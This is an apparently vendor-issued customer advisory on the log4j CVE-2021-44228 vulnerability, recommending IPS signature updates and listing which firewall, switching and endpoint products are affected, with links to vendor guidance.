Last week a vulnerability was published regarding the Apache log4j, a Java-based logging framework. The vulnerability leads to remote command execution (rce) that can easily be initiated by sending a specific string to any Java application that requires user input.
At the moment the internet is being scanned massively for hosts that have any web services open which could potentially be exploited. Our firewall vendors already have an IPS signature available that detect and drop this exploit, below an example:
Make sure your firewall has the latest IPS signature database downloaded, and IPS is enabled on any inbound firewall rules for internet-facing hosts, specifically port 80.
Our firewall vendors have the following guidelines available:
- Palo Alto Networks: https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
- Fortinet: https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability
- Barracuda Networks: https://campus.barracuda.com/news/item/2AK9N
Below a list of our vendor products that are possibly affected by this exploit. We have excluded any SaaS solutions from the list as this is the vendors responsibility:
Omniswitch / Stellar / Omnivista not affected : https://www.al-enterprise.com//en/-/media/assets/internet/documents/n-to-s/sa-c00068ed3-en.pdf
Barracuda Cloudgen Firewalls not affected: https://campus.barracuda.com/news/item/2AK9N
Barracuda Web Application Firewall not affected: https://campus.barracuda.com/product/webapplicationfirewall/doc/96024300/apache-log4j-critical-vulnerability-cve-2021-44228/
Barracuda Sentinel, VPN client, Cloud Services unknown
Tip: use Canary token to help detect CVE-2021-44228: https://help.canary.tools/hc/en-gb/articles/4413465229201-Using-a-Canarytoken-to-help-test-for-CVE-2021-44228-log4j-log4shell-
Fortigate not affected: https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability
Palo Alto Networks
Officescan / ApexOne / WorryFree not affected: https://success.trendmicro.com/solution/000289940